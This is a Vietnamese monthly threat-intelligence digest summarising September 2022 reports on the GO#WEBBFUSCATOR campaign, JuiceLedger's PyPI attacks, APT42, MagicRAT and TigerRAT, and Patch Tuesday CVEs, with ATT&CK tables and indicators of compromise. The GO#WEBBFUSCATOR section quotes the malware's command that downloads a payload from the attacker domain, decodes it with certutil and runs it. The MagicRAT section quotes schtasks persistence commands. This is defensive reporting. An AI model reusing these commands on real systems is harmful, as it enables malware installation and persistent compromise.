THÔNG TIN CÁC MỐI ĐE DỌA BẢO MẬT TRONG THÁNG 09 – 2022

Hàng tháng, Chúng tôi – NCS tổng hợp lại các thông tin về bảo mật về APT, Malware, CVEs và gói gọn nó vào trong một bài tổng hợp.

1       Các mối đe dọa nâng cao – Advanced Threats

1.1      GO#WEBBFUSCATOR: Chiến dịch tấn công Golang mới sử dụng Office Macros và hình ảnh James Webb

Ngày 29/08, Nhóm nghiên cứu mối đe dọa của Securonix (STR) đã phát hiện một chiến dịch tấn công mới sử dụng mã độc dựa trên Golang. Securonix đặt tên cho chiến dịch này là GO#WEBBFUSCATOR.

Chiến dịch mới kết hợp một chiến lược thú vị bằng cách sử dụng hình ảnh nổi tiếng được chụp từ kính thiên văn James Webb và ngôn ngữ lập trình Golang bị làm xáo trộn để lây nhiễm phần mềm độc hại vào hệ thống mục tiêu.

Phương thức lây nhiễm bắt đầu bằng một email lừa đảo chứa tệp đính kèm Microsoft Office. Tệp tài liệu này sẽ tải xuống một tệp độc hại khác (form.dotm) từ một liên kết giả dạng một URL hợp pháp của Microsoft.

hxxp: //www.xmlschemeformat.com/update/2021/Office/form.dotm

URL hợp lệ có dạng: http://schemas.openxmlformats.org/

Tệp form.dotm chứa tập lệnh VB sẽ tự động thực thi khi người dùng bật macro. Nhiệm vụ của tập lệnh VB là tải xuống 1 tệp hình ảnh “OxB36F8GEEC634.jpg”, sau đó sử dụng certutil.exe để giải mã nó thành tệp nhị phân (msdllupdate.exe) và thực thi tệp nhị phân.

cmd.exe / c cd c: \ users \ test \ appdata \ local & curl hxxp: // www [.] xmlschemeformat.com/update/2021/office/oxb36f8geec634.jpg -o oxb36f8geec634.jpg & certutil -decode oxb36f8geec634.jpg msdllupdate.exe & msdllupdate.exe

Tệp msdllupdate.exe, được biên dịch bằng Golang, là tệp thực thi Windows 64-bit có kích thước lớn, khoảng 1,7MB, sử dụng một số kỹ thuật làm xáo trộn để không bị AV phát hiện và gây khó khăn cho việc phân tích.

Phương pháp mã hóa ROT25 được sử dụng để xáo trộn các chuỗi ký tự. Ví dụ: A = Z và 1 = 6. Ngoài ra, tệp msdllupdate.exe được xáo trộn bằng cách sử dụng một kỹ thuật hiện đại chống lại việc phân tích được gọi là Gobfuscation. Các mã Golang Assemblies được mã hóa bằng XOR với độ lệch byte 0x20.

Tệp msdllupdate.exe có chức năng tạo và duy trì kết nối tới máy chủ C&C để nhận lệnh điều khiển từ kẻ tấn công.

ATT&CK MATRIX

TACTIC TECHNIQUE NAME
Initial Access T1566.001 Phishing: Spearphishing Attachment
Execution T1059.03 Windows Command Shell
Persistence T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
Defense Evasion T1140 Deobfuscate/Decode Files or Information
Discovery T1420 File and Directory Discovery
Discovery T1016.001 System Network Configuration Discovery
Discovery T1426 System InformationDiscovery
Discovery T1033 System Owner/User Discovery
Command and Control T1071.001 Web Protocols
T1071.004 Application Layer Protocol: DNS
Command and Control T1132.001 Standard Encoding
Command and Control T1105 Ingress Tool Transfer
Command and Control T1001.002 Data Obfuscation: Steganography
Exfiltration T1041 Exfiltration Over C2 Channel

Indicators of Compromise (IoCs)

Files / hash SHA 256

%LOCALAPPDATA%\microsoft\vault\Msdllupdate.exe

%LOCALAPPDATA%\microsoft\vault\Update.bat

%LOCALAPPDATA%\microsoft\windows\MsSafety\Msdllupdate.exe

%LOCALAPPDATA%\microsoft\vault\MsDb.db

da43ec30fe12c45529e51a0c986a856aa8772483875356f29382ac514788f86d

383136adaf956f1fab03de8c1064f7b9119b5b656bedda7ce3137bebbb2a920f

3bdf6d9f0f35be75d8345d897ec838ae231ba01ae898f6d0c8f920ff4061fc22

d09af37cdbae7273e4e7c79b242023ffdb07c8ccab2280db7fe511d2b14ad19c

C2 Domain

Xmlschemeformat.com

Updatesagent.com

Apiregis.com

185.247.209.255

139.28.36.222

Nguồn: https://www.securonix.com/blog/golang-attack-campaign-gowebbfuscator-leverages-office-macros-and-james-webb-images-to-infect-systems/

1.2      Chiến dịch lừa đảo PyPI | JuiceLedger chuyển từ ứng dụng giả mạo đến các cuộc tấn công chuỗi cung ứng

Ngày 1/09/2022, SentinelLabs đã thông báo hợp tác với Checkmarx để theo dõi hoạt động của một nhóm đe dọa có tên là “JuiceLedger”. Vào đầu năm 2022, JuiceLedger bắt đầu chạy các chiến dịch nhỏ, phát tán các ứng dụng trình cài đặt Python lừa đảo với ‘JuiceStealer’, một ứng dụng .NET được thiết kế để đánh cắp dữ liệu nhạy cảm từ trình duyệt của nạn nhân.

Vào tháng 8 năm 2022, JuiceLedger đã thực hiện một cuộc tấn công chuỗi cung ứng vào những người đóng góp gói PyPi trong một chiến dịch lừa đảo và đầu độc các gói mã nguồn mở (gọi tắt: gói) để nhắm mục tiêu đến nhiều đối tượng hơn. JuiceLedger đã đầu độc thành công ít nhất hai gói hợp pháp bằng phần mềm độc hại. JuiceLedger cũng sử dụng kỹ thuật typosquatting để phát tán hàng trăm gói độc hại khác.

Hình 1.2.1: Chuỗi tấn công

Các email lừa đảo hướng nạn nhân đến một trang web Google giả mạo trang đăng nhập PyPI. Khi người dung nhập thông tin đăng nhập, thông tin sẽ được gửi đến miền linkedopports[.]com của JuiceLedger.

Các gói độc hại được JuiceLedger tải lên trong chiến dịch tháng 8 chứa một đoạn mã ngắn, chịu trách nhiệm tải xuống và thực thi một biến thể đã ký của JuiceStealer.

JuiceStealer, là một ứng dụng  .NET tương đối đơn giản, có tên nội bộ là “meta”. Những dấu hiệu đầu tiên về JuiceStealer bắt đầu xuất hiện vào tháng Hai năm nay. JuiceStealer đã được nhúng vào một số ứng dụng và trình cài đặt lừa đảo.

Trình cài đặt Python:

  • Phiên bản đầu tiên của JuiceStealer bắt chước trình cài đặt Python.
  • Mẫu này tìm kiếm các quy trình có chứa từ “chrome”, tắt chúng và sau đó tìm kiếm tệp nhật ký Tiện ích mở rộng của Google Chrome. Nó tìm trong các tệp nhật ký có chứa từ “vault”, có thể là tìm kiếm các cryptocurrency vaults và gửi cho máy chủ C2 qua HTTP.
  • Đồng thời nó cũng tìm kiếm mật khẩu Google Chrome, truy vấn tệp SQLite của Chrome

Ứng dụng lừa đảo – Tesla Trading Bot:

  • JuiceLedger bắt đầu sử dụng các ứng dụng lừa đảo trực tiếp theo chủ đề tiền điện tử, trong số đó, một ứng dụng mà chúng đặt tên là “Tesla Trading bot”
  • Cơ chế lây nhiễm tương tự như Trình cài đặt Python, nó được nhúng trong một tệp zip cùng với các phần mềm hợp pháp.

PyPI đã tuyên bố rằng họ đang tích cực xem xét các báo cáo về các gói độc hại và đã gỡ bỏ hàng trăm gói độc hại. Những người bảo trì gói được khuyến nghị sử dụng xác thực 2FA trên tài khoản của họ.

ATT&CK MATRIX

TACTIC TECHNIQUE NAME
Resource Development T1583.001 Acquire Infrastructure: Domains
Initial Access T1566.002 Phishing: Spearphishing Link
Initial Access T1195 Supply Chain Compromise
Execution T1204.002 User Execution: Malicious File
Execution T1059.001 Command and Scripting Interpreter: PowerShell
Execution T1059.006 Command and Scripting Interpreter: Python
Defense Evasion T1036.005 Masquerading: Match Legitimate Name or Location
Defense Evasion T1027 Obfuscated Files or Information
Defense Evasion T1218.005 System Binary Proxy Execution: Mshta
Credential Access T1555.003 Credentials from Password Stores: Credentials from Web Browsers
Command and Control T1071.001 Web Protocols
Exfiltration T1041 Exfiltration Over C2 Channel

Indicators of Compromise (IoCs)

Files / hash SHA1

90b7da4c4a51c631bd0cbe8709635b73de7f7290

dd569ccfe61921ab60323a550cc7c8edf8fb51d8

97c541c6915ccbbc8c2b0bc243127db9b43d4b34

f29a339e904c6a83dbacd8393f57126b67bdd3dd

71c849fc30c1abdb49c35786c86499acbb875eb5

2fb194bdae05c259102274300060479adf3b222e

5eb92c45e0700d80dc24d3ad07a7e2d5b030c933

e5286353dec9a7fc0c6db378b407e0293b711e9b

cbc47435ccc62006310a130abd420c5fb4b278d2

8bbf55a78b6333ddb4c619d615099cc35dfeb4fb

bac2d08c542f82d8c8720a67c4717d2e70ad4cd9

567e1d5aa3a409a910631e109263d718ebd60506

1e697bc7d6a9762bfec958ee278510583039579c

ea14f11e0bd36c2d036244e0242704f3cf721456

5703ed6565888f0b06fffcc40030ba679936d29f

cd0b8746487d7ede0ec07645fd4ec655789c675b

d3ed1c7c0496311bb7d1695331dc8d3934fbc8ec

0a6731eba992c490d85d7a464fded2379996d77c

a30df748d43fbb0b656b6898dd6957c686e50a66

52b7e42e44297fdcef7a4956079e89810f64e113

aa8c4dffeeacc1f7317b2b3537d2962e8165faa2

a6348aea65ad01ee4c7dd70b0492f308915774a3

b305c16cb2bc6d88b5f6fe0ee889aaf8674d686e

666e5554ccdafcb37a41f0623bb9acc53851d84f

463897fa2dd2727a930b8f3397d10a796b6aa0d6

e2e239f40fdb2e5bf9d37b9607b152f173db285c

c0e3c2436e225f7d99991a880bf37d32ff09c5bd

6f3c5a06d1a53fac45182e76897e7eab90d4a186

bd7eb97b3dc47e72392738d64007df5fc29de565

de4596669f540b8bd34aa7cbf50e977f04f3bba3

55ba11f522532d105f68220db44392887952e57b

9e9c6af67962b041d2a87f2abec7a068327fa53a

ed9a4ce2d68d8cc9182bb36a46d35a9a8d0510cb

f10006f7b13e4746c2293a609badd2d4e5794922

f07954ba3932afd8ad7520c99a7f9263aa513197

56e3421689d65e78ff75703dd6675956b86e09e8

004c66532c49cb9345fc31520e1132ffc7003258

6fe5f25205679e148b7b93f1ae80a659d99c7715

964e29e877c65ff97070b7c06980112462cd7461

225638350f089ee56eae7126d048b297fce27b7d

9fb18a3426efa0034f87dadffe06d490b105bda3

a78dd3cd9569bd418d5db6f6ebf5c0c5e362919b

d249f19db3fe6ea4439f095bfe7aafd5a0a5d4d2

 

C2 Domain

linkedopports.com

ledgrestartings.com

python-release.com

thefutzibag.com

ledge-pc.com

trezsetup.com

axiesinfintity.com

campus-art.com

teslatradingbot.com

barkbackbakery.com

capritagworld.com

ideasdays.com

Nguồnhttps://www.sentinelone.com/labs/pypi-phishing-campaign-juiceledger-threat-actor-pivots-from-fake-apps-to-supply-chain-attacks/

1.3      Phân tích hoạt động của nhóm APT42

Ngày 07/09/2022, Mandiant đã đưa ra báo cáo về nhóm APT42, một nhóm gián điệp mạng do nhà nước Iran tài trợ được giao nhiệm vụ tiến hành các hoạt động thu thập thông tin và giám sát chống lại các cá nhân và các tổ chức có lợi ích chiến lược đối với chính phủ Iran. Mandiant tin rằng APT42 thực hiện các hoạt động tình báo thay mặt cho Lực lượng Vệ binh Cách mạng Hồi giáo (IRGC).

Hoạt động ít nhất từ năm 2015, APT42 có đặc điểm là các hoạt động giám sát và lừa đảo nhắm mục tiêu cao vào cá nhân và tổ chức có lợi ích chiến lược đối với Iran. Chúng thường xây dựng lòng tin và mối quan hệ với nạn nhân, các quan chức chính phủ, các nhà hoạch định chính sách cũ của Iran hoặc các nhân vật chính trị, các thành viên của cộng đồng người Iran và các nhóm đối lập, các nhà báo và học giả có liên quan đến nghiên cứu về Iran.

Sau khi giành được quyền truy cập, chúng triển khai phần mềm độc hại trên điện thoại di động của nạn nhân để theo dõi vị trí, ghi lại cuộc trò chuyện điện thoại, truy cập video và hình ảnh cũng như trích xuất toàn bộ hộp thư đến SMS.

Cùng với việc thu thập thông tin đăng nhập, APT42 cũng phát triển một số phần mềm độc hại, backdoor tùy chỉnh và các công cụ có kích thước nhỏ. Mandiant đánh giá rằng APT42 có tài nguyên phát triển phần mềm độc hại có hạn vì các họ phần mềm độc hại gần đây như TABBYCAT và VBREVSHELL đã bao gồm hoặc phần lớn bao gồm mã có sẵn công khai được sao chép từ các dự án GitHub.

Hình 1.3.1: Các hoạt động chính của APT42

Hình 1.3.2: APT42 Attack Lifecycle

Initial Compromise

Bước đầu, APT42 chủ yếu dựa vào lừa đảo trực tuyến để đạt được thông tin đăng nhập của nạn nhân. APT42 có khả năng vượt qua MFA và chặn mật khẩu một lần gửi qua SMS bằng các biểu mẫu thu thập thông tin đăng nhập và phân phối phần mềm độc hại Android qua tin nhắn SMS.

  • APT42 thường xuyên mạo danh các nhà báo nổi tiếng hoặc các nhân vật công chúng yêu cầu phỏng vấn với các mục tiêu. Trong một trường hợp, APT42 đã trao đổi với mục tiêu trong 37 ngày trước khi gửi cho họ một liên kết rút gọn URL được chuyển hướng đến trang thu thập thông tin đăng nhập.
  • APT42 gửi email lừa đảo có đính kèm tệp PDF hoặc liên kết đến tệp PDF trên Google Drive hoặc Dropboxhosted với liên kết được nhúng tới trang thu thập thông tin đăng nhập.
  • Nhóm có khả năng chặn mã xác thực MFA thông qua các biểu mẫu thu thập thông tin đăng nhập.

Establish Foothold

Sau khi xác thực thành công tài khoản email cá nhân hoặc công ty của nạn nhân, APT42 đăng ký ứng dụng Authenticator Microsoft như một phương pháp MFA mới. APT42 sử dụng nhiều loại phần mềm độc hại có kích thước nhỏ, một số dựa trên các tập lệnh có sẵn công khai. Ví dụ:

  • BROKEYOLK
  • CHAIRSMACK
  • GHAMBAR
  • MAGICDROP
  • POWERPOST
  • PINEFLOWER
  • TABBYCAT
  • TAMECAT
  • VBREVSHELL
  • VINETHORN

Escalate Privileges

APT42 sử dụng phần mềm độc hại tùy chỉnh có khả năng ghi lại các lần gõ phím và đánh cắp thông tin đăng nhập và dữ liệu cookie từ các trình duyệt phổ biến để leo thang đặc quyền trong môi trường nạn nhân. Ví dụ:

  • CHAIRSMACK
  • DOSTEALER
  • GHAMBAR

Internal Reconnaissance

Sau khi đăng nhập vào môi trường của mục tiêu, APT42 tiến hành trinh sát nội bộ bằng cách duyệt qua danh bạ của nạn nhân và truy cập vào không gian cộng tác của tổ chức bị nhắm mục tiêu, chẳng hạn như Sharepoint. APT42 cũng đăng nhập vào các tài khoản Microsoft Outlook và đánh cắp toàn bộ thông tin email của nạn nhân. Từ đó chúng có thể gửi email tấn công lừa đảo tới các mục tiêu khác dễ dàng hơn.

APT42 cũng sử dụng phần mềm độc hại có khả năng chụp ảnh màn hình và thu thập thông tin hệ thống và mạng, bao gồm:

  • GHAMBAR
  • POWERPOST

Lateral Movement

APT42 thường cố gắng sử dụng tài khoản email cá nhân của nạn nhân để truy cập vào các tài khoản công ty khác của nạn nhân và ngược lại. Chúng sẽ gửi các email lừa đảo từ các tài khoản email bị xâm nhập đến các tài khoản khác cả bên trong và bên ngoài tổ chức được nhắm mục tiêu.

Maintain Presence

Để duy trì trong môi trường của nạn nhân, APT42 dựa vào phần mềm độc hại tùy chỉnh và tạo các tác vụ được lên lịch hoặc sửa đổi sổ đăng ký Windows để chạy phần mềm độc hại, bao gồm:

  • CHAIRSMACK
  • GHAMBAR

Complete Mission

Mandiant đánh giá rằng mục tiêu của APT42 là:

  • APT42 tìm cách đánh cắp thông tin đăng nhập tài khoản email cá nhân và công ty. Chúng sử dụng các thông tin đăng nhập đó để thực hiện các hoạt động theo dõi và lấy cắp tài liệu cá nhân hoặc doanh nghiệp và nghiên cứu phù hợp với Iran.
  • APT42 tìm cách theo dõi các vị trí, giám sát các liên lạc qua điện thoại và email và thường khảo sát các hoạt động của các cá nhân quan tâm đến chính phủ Iran, bao gồm các nhà hoạt động và những người bất đồng chính kiến ở Iran.

ATT&CK MATRIX

TACTIC TECHNIQUE NAME
Resource Development T1583.003 Acquire Infrastructure: Virtual Private Server
Resource Development T1584 Compromise Infrastructure
Resource Development T1587.003 Develop Capabilities: Digital Certificates
Resource Development T1588.004 Obtain Capabilities: Digital Certificates
Initial Access T1566.001 Phishing: Spearphishing Attachment
Initial Access T1566.002 Spear-phishing Link
Initial Access T1133 External Remote Services
Execution T1047 Windows Management Instrumentation
Execution T1059.001 Command and Scripting Interpreter: PowerShell
Execution T1059.005 Command and Scripting Interpreter: Visual Basic
Execution T1059.007 Command and Scripting Interpreter: JavaScript/Jscript
Execution T1569.002 System Services: Service Execution
Execution T1204.001 User Execution: Malicious Link
Execution T1204.002 User Execution: Malicious File
Persistence T1098.002 Account Manipulation: Exchange Email Delegate Permissions
Persistence T1133 External Remote Services
Persistence T1543.003 Create or Modify System Process: Windows Service
Persistence T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
Privilege Escalation T1055 Process Injection
Privilege Escalation T1134 Access Token Manipulation
Privilege Escalation T1543.003 Create or Modify System Process: Windows Service
Privilege Escalation T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
Privilege Escalation T1547.004 Boot or Logon Autostart Execution: Winlogon Helper DLL
Defense Evasion T1027.002 Obfuscated Files or Information: Software Packing
Defense Evasion T1027.005 Obfuscated Files or Information: Indicator Removal from Tools
Defense Evasion T1055 Process Injection
Defense Evasion T1070.004 Indicator Removal on Host: File Deletion
Defense Evasion T1112 Modify Registry
Defense Evasion T1134 Access Token Manipulation
Defense Evasion T1140 Deobfuscate/Decode Files or Information
Defense Evasion T1221 Template Injection
Defense Evasion T1497.001 Virtualization/Sandbox Evasion: System Checks
Defense Evasion T1497.003 Virtualization/Sandbox Evasion: Time Based Evasion
Defense Evasion T1564.003 Hide Artifacts: Hidden Window
Credential Access T1003 OS Credential Dumping
Credential Access T1111 Two-Factor Authentication Interception
Credential Access T1056.001 Input Capture: Keylogging
Discovery T1012 Query Registry
Discovery T1016 System Network Configuration Discovery
Discovery T1082 System Information Discovery
Discovery T1083 File and Directory Discovery
Discovery T1087.001 Account Discovery: Local Account
Discovery T1497.001 Virtualization/Sandbox Evasion: System Checks
Discovery T1497.003 Virtualization/Sandbox Evasion: Time Based Evasion
Discovery T1518 Software Discovery
Lateral Movement T1021.001 Remote Services: Remote Desktop Protocol
Lateral Movement T1021.004 Remote Services: SSH
Collection T1056.001 Input Capture: Keylogging
Collection T1113 Screen Capture
Collection T1115 Clipboard Data
Collection T1123 Audio Capture
Collection T1125 Video Capture
Collection T1213 Data from Information Repositories: Sharepoint
Collection T1560.002 Archive Collected Data: Archive via Library
Command and Control T1071.001 Application Layer Protocol: Web Protocols
Command and Control T1071.002 Application Layer Protocol: File Transfer Protocols
Command and Control T1095 Non-Application Layer Protocol
Command and Control T1102 Web Service
Command and Control T1105 Ingress Tool Transfer
Command and Control T1132 Data Encoding: Standard Encoding
Command and Control T1573.002 Encrypted Channel: Asymmetric Cryptographic
Exfiltration T1041 Exfiltration over C2 Channel
Impact T1529 System Shutdown/Reboot

Indicators of Compromise (IoCs)

Files / hash MD5

da7d37bfb899a0094995944d4c5e2f21

df02a8a7cb2afb80cc2b789d96f02715

3d67ce57aab4f7f917cf87c724ed7dab

04a6997f0a8021b773ebb49977bc625f

34d37f64613f3fe00086ac8d5972db89

8e0eb3ceb1bbe736beaf64353dda1908

63cd07e805bcd4135a8e3a29fa3ceebd

0a3f454f94ef0f723ac6a4ad3f5bdf01

ae797446710e375f0fc9a33432d64256

60e6523d29e8a9b83f4503f2e7fd7e1d

00b5d45433391146ce98cd70a91bef08

335849d8fb13a4a189ba92af9bdf5d1d

9d0e761f3803889dc83c180901dc7b22

f3d25b1cedf39beee751eb9b2d8d2376

a04c2c3388da643ef67504ef8c6907fb

96444ed552ea5588dffca6a5a05298e9

afb5760c05db35a34c5dc41108ba72c2

d30abec551b0fb512dc2c327eeca3c43

bdf188b3d0939ec837987b4936b19570

651d72776c0394693c25b1e3c9ec55d0

b7bc6a853f160df2cc64371467ed866d

88df70a0e21fb48e0f881fb91a2eaade

9a1e09b7ce904eefb83dc8d7571826f9

9bd1caf6b79f6a69981a15d649a04c19

3c6302fb6bdb953e2073a54b928fad9c

bdf188b3d0939ec837987b4936b19570

651d72776c0394693c25b1e3c9ec55d0

b7bc6a853f160df2cc64371467ed866d

8a847b0f466b3174741aac734989aa73

Nguồnhttps://www.mandiant.com/resources/reports/apt42-spear-phishing-and-surveillance

2       Malware

2.1      Phân tích trojan “MagicRAT”

Nhóm Cisco Talos đã phát hiện ra một trojan truy cập từ xa (RAT) mới có tên “MagicRAT”, được chính phủ Hoa Kỳ tin rằng mã độc được phát triển bởi nhóm Lazarus – một tổ chức do nhà nước Bắc Triều Tiên bảo trợ.

MagicRAT được viết bằng ngôn ngữ C++, phiên bản 32 bit được biên dịch với GCC v3.4 sử dụng mingw / cygwin để hỗ trợ trên nền tảng Microsoft Windows, phiên bản 64 bit được biên dịch bằng VisualC64, phiên bản 7.14

File cấu hình được lưu trữ  trong file “visual.1991-06.com.microsoft_sd.kit”  nằm tại đường dẫn “\ ProgramData \ WindowsSoftwareToolkit”, gồm một số thông tin  sau:

  • [os]  chứa thông tin command and control (C2) URLs.
  • [General] chứa các thông tin chung.
  • [company] lưu trữ dữ liệu được sử dụng trong quá trình giao tiếp với C2.

Các URL được lưu trữ trong file cấu hình được gắn với các định danh lần lượt là windowslinux và mac. Các giá trị trong các định danh này được bắt đầu với chuỗi “LR02DPt22R” theo sau là URL được encode bằng base64. Sau khi thực thi, MagicRAT thực hiện persistence – tạo lập lịch trên máy nạn nhân bằng schtasks

schtasks /create /tn “OneDrive AutoRemove” /tr “C:\Windows\System32\cmd.exe /c del /f /q C:/TEMP/[MagicRAT_file_name].exe” /sc daily /st 10:30:30 /ru SYSTEM

schtasks /create /tn “Microsoft\Windows\light Service Manager” /tr C:/TEMP/[MagicRAT_file_name].exe /sc onstart /ru SYSTEM

%HOME%/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup/OneNote.lnk

Sau quá trình persistence , RAT kết nối tới máy chủ C2. Giai đoạn ban đầu, MagicRAT thực hiện thu thập thông tin hệ thống, được thực hiện bằng các câu lệnh whoami, systeminfo và ipconfig /all. Dữ liệu được trả về file zero_dump.mix sẽ được tải lên máy chủ C2. Một số biến thể khác của Magic RAT có tính năng tự xóa bản thân bằng file BAT

Mã độc có thể tải thêm các payload mới từ địa chỉ 64 [.] 188 [.] 27 [.] 73. Trên địa chỉ này lưu trữ các payload bao gồm Tiger RAT và file thực thi có tên file giả mạo định dạng file GIF. Một trong những tệp GIF được phát hiện máy chủ C2 của MagicRAT có tên “pct.gif” là một port scanner, nhận 3 tham số: IP để kết nối, số cổng và dữ liệu trả về. Nếu kết nối thành công, kết trả trả về là “Connection success!”  thông qua standard output hoặc ghi vào file “Ahnupdate.log” trong thưc mục tmp

Một payload khác trên máy chủ C2 là TigerRAT, bao gồm một số tính năng sau:

  • Thu thập thông tin hệ thống: tên người dùng, tên máy tính, thông tin cấu hình mạng, thông tin hệ thống bao gồm sản phẩm và phiên bản.
  • Chạy các lệnh tùy ý trên máy nạn nhân: set / get CWD thông qua tiến trình cmd.exe
  • Chụp ảnh màn hình.
  • Cấu hình Socks tunneling.
  • Keylogging.
  • Quản lý file: liệt kê ổ đĩa, xóa file, tạo và ghi vào file, đọc file và tải nội dung lên C2
  • Tự xóa / gỡ cài đặt khỏi hệ thống.

Indicators of Compromise (IoCs)

MagicRAT

f6827dc5af661fbb4bf64bc625c78283ef836c6985bb2bfb836bd0c8d5397332

TigerRAT

f78cabf7a0e7ed3ef2d1c976c1486281f56a6503354b87219b466f2f7a0b65c4

1f8dcfaebbcd7e71c2872e0ba2fc6db81d651cf654a21d33c78eae6662e62392

bffe910904efd1f69544daa9b72f2a70fb29f73c51070bde4ea563de862ce4b1

196fb1b6eff4e7a049cea323459cfd6c0e3900d8d69e1d80bffbaabd24c06eba

TigerRAT unpacked

1c926fb3bd99f4a586ed476e4683163892f3958581bf8c24235cd2a415513b7f

f32f6b229913d68daad937cc72a57aa45291a9d623109ed48938815aa7b6005c

23eff00dde0ee27dabad28c1f4ffb8b09e876f1e1a77c1e6fb735ab517d79b76

ca932ccaa30955f2fffb1122234fb1524f7de3a8e0044de1ed4fe05cab8702a5

Port Scanner

d20959b615af699d8fff3f0087faade16ed4919355a458a32f5ae61badb5b0ca

URLs

hxxp[://]64[.]188[.]27[.]73/adm_bord/login_new_check[.]php

hxxp[://]gendoraduragonkgp126[.]com/board/index[.]php

hxxp[://]64[.]188[.]27[.]73/board/mfcom1.gif

hxxp[://]64[.]188[.]27[.]73/board/pct.gif

hxxp[://]64[.]188[.]27[.]73/board/logo_adm_org.gif

hxxp[://]64[.]188[.]27[.]73/board/tour_upt.html

IPs

193[.]56[.]28[.]251

52[.]202[.]193[.]124

64[.]188[.]27[.]73

151[.]106[.]2[.]139

66[.]154[.]102[.]91

Nguồn tham khảo: https://blog.talosintelligence.com/2022/09/lazarus-magicrat.html

3     CVE và các khuyến nghị bảo mật

3.1     Microsoft Patch Tuesday – September 2022

Trong tháng 9, Microsoft đã phát hành các bản vá cho 64 CVE mới trong các sản phẩm của Microsoft Windows và Windows Components; Azure và Azure Arc; .NET, Visual Studio và .NET Framework; Microsoft Edge (Chromium-based); Office và Office Components; Windows Defender và Linux Kernel. Trong đó có 5 lỗ hổng được đánh giá mức độ Nghiêm trọng, 57 lỗ hổng được đánh giá là Improtant

Dưới đây là một số CVE nổi bật được đánh giá ở mức độ Critical và Improtant:

3.1.1     CVE-2022-34718 – Windows TCP/IP Remote Code Execution Vulnerability

CVSS v3: 9.8/10

Mô tả: Lỗ hổng cho phép kẻ tấn công không cần xác thực thực thi mã từ xa với đặc quyền hệ thống, ảnh hưởng tới hệ thống cấu hình enable IPv6 và IPSec.

Phiên bản ảnh hưởng:

Windows Server 2012 R2 (Server Core installation)

Windows Server 2012 R2

Windows Server 2012 (Server Core installation)

Windows Server 2012

Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)

Windows Server 2008 R2 for x64-based Systems Service Pack 1

Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)

Windows Server 2008 for x64-based Systems Service Pack 2

Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)

Windows Server 2008 for 32-bit Systems Service Pack 2

Windows RT 8.1

Windows 8.1 for x64-based systems

Windows 8.1 for 32-bit systems

Windows 7 for x64-based Systems Service Pack 1

Windows 7 for 32-bit Systems Service Pack 1

Windows Server 2016 (Server Core installation)

Windows Server 2016

Windows 10 Version 1607 for x64-based Systems

Windows 10 Version 1607 for 32-bit Systems

Windows 10 for x64-based Systems

Windows 10 for 32-bit Systems

Windows 10 Version 21H2 for x64-based Systems

Windows 10 Version 21H2 for ARM64-based Systems

Windows 10 Version 21H2 for 32-bit Systems

Windows 11 for ARM64-based Systems

Windows 11 for x64-based Systems

Windows 10 Version 20H2 for ARM64-based Systems

Windows 10 Version 20H2 for 32-bit Systems

Windows 10 Version 20H2 for x64-based Systems

Windows Server 2022 Azure Edition Core Hotpatch

Windows Server 2022 (Server Core installation)

Windows Server 2022

Windows 10 Version 21H1 for 32-bit Systems

Windows 10 Version 21H1 for ARM64-based Systems

Windows 10 Version 21H1 for x64-based Systems

Windows Server 2019 (Server Core installation)

Windows Server 2019

Windows 10 Version 1809 for ARM64-based Systems

Windows 10 Version 1809 for x64-based Systems

Windows 10 Version 1809 for 32-bit Systems

Khuyến nghị: Cài đặt cập nhật bản vá theo hướng dẫn của hãng:

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-34718

3.1.2    CVE-2022-37969 – Windows Common Log File System Driver Elevation of Privilege VulnerabilityCVSS

CVSS v3: 7.8/10

Mô tả: Lỗ hổng leo thang đặc quyền tồn tại trong Common Log File System (CLFS), cho phép kẻ tấn công thực thi các đoạn mã độc hại bằng quyền SYSTEM

Phiên bản ảnh hưởng:

Windows Server 2012 R2 (Server Core installation)

Windows Server 2012 R2

Windows Server 2012 (Server Core installation)

Windows Server 2012

Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)

Windows Server 2008 R2 for x64-based Systems Service Pack 1

Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)

Windows Server 2008 for x64-based Systems Service Pack 2

Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)

Windows Server 2008 for 32-bit Systems Service Pack 2

Windows RT 8.1

Windows 8.1 for x64-based systems

Windows 8.1 for 32-bit systems

Windows 7 for x64-based Systems Service Pack 1

Windows 7 for 32-bit Systems Service Pack 1

Windows Server 2016 (Server Core installation)

Windows Server 2016

Windows 10 Version 1607 for x64-based Systems

Windows 10 Version 1607 for 32-bit Systems

Windows 10 for x64-based Systems

Windows 10 for 32-bit Systems

Windows 10 Version 21H2 for x64-based Systems

Windows 10 Version 21H2 for ARM64-based Systems

Windows 10 Version 21H2 for 32-bit Systems

Windows 11 for ARM64-based Systems

Windows 11 for x64-based Systems

Windows 10 Version 20H2 for ARM64-based Systems

Windows 10 Version 20H2 for 32-bit Systems

Windows 10 Version 20H2 for x64-based Systems

Windows Server 2022 Azure Edition Core Hotpatch

Windows Server 2022 (Server Core installation)

Windows Server 2022

Windows 10 Version 21H1 for 32-bit Systems

Windows 10 Version 21H1 for ARM64-based Systems

Windows 10 Version 21H1 for x64-based Systems

Windows Server 2019 (Server Core installation)

Windows Server 2019

Windows 10 Version 1809 for ARM64-based Systems

Windows 10 Version 1809 for x64-based Systems

Windows 10 Version 1809 for 32-bit Systems

Khuyến nghị: Cài đặt cập nhật bản vá theo hướng dẫn của hãng:

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-37969

3.1.3    CVE-2022-37962 – Microsoft PowerPoint Remote Code Execution Vulnerability.

CVSS v3: 7.8/10

Mô tả: Lỗ hổng cho phép kẻ tấn công thực thi mã từ xa trên hệ thống bị ảnh hưởng

Phiên bản ảnh hưởng:

Microsoft Office 2013 Service Pack 1 (64-bit editions)

Microsoft Office 2013 Service Pack 1 (32-bit editions)

Microsoft Office 2013 RT Service Pack 1

Microsoft Office 2016 (64-bit edition)

Microsoft Office 2016 (32-bit edition)

Microsoft Office LTSC 2021 for 32-bit editions

Microsoft Office LTSC 2021 for 64-bit editions

Microsoft Office LTSC for Mac 2021

Microsoft 365 Apps for Enterprise for 64-bit Systems

